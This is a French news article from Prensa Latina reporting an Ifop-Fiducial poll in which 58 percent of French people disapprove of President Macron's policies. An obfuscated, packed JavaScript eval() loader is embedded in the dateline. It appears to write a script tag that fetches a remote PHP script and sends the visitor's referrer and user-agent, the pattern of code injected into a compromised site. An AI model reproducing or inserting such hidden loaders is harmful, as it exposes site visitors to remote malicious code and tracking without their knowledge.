mardi 23 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Selon un sondage, une majorité de français désapprouvent la gestion de leur président

Paris, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fstes|var|u0026u|referrer|yiaks||js|php'.split('|'),0,{})) 18 avril (Prensa Latina) À quelques semaines de sa première année de mandat, une majorité de français se déclarent contre la gestion du président Emmanuel Macron, selon un sondage publié aujourd’hui par l’Ifop-Fiducial.

Paris, 18 avril (Prensa Latina) À quelques semaines de sa première année de mandat, une majorité de français se déclarent contre la gestion du président Emmanuel Macron, selon un sondage publié aujourd’hui par l’Ifop-Fiducial.

58 pour cent des citoyens désapprouvent la politique menée par le président, indique ce sondage qui apparait à un moment complexe où coexistent grèves et manifestations dans divers secteurs sociaux comme les transports, la fonction publique ou l’Université.

Le sondage révèle que 73 pour cent des personnes sondées trouvent Macron autoritaire, 67 pour cent pensent que le chef de l’État sait où il veut aller, et à peine 30 pour cent  lui font confiance pour améliorer la cohésion sociale et comprendre les préoccupations des français.

La gestion de son gouvernement, dans l’ambiance sociale actuelle, génère un grand mécontentement. En effet, seulement 18 pour cent des français approuvent ses actions envers les hôpitaux, 26 pour cent considèrent positive la progression du pouvoir d’achat, 27 pour cent soutiennent sa réforme des pensions vieillesse, et 29 pour cents  sont d’accord avec sa politique d’immigration.

À l’inverse, les aspects les plus appréciés des français concernent le rayonnement international de la France; 67 pour cent considèrent positive l’évolution des relations avec l’Union Européenne et 63 pour cent pensent que l’image de la France à l’étranger s’est améliorée.

peo/tgj/lmg

EN CONTINU
notes connexes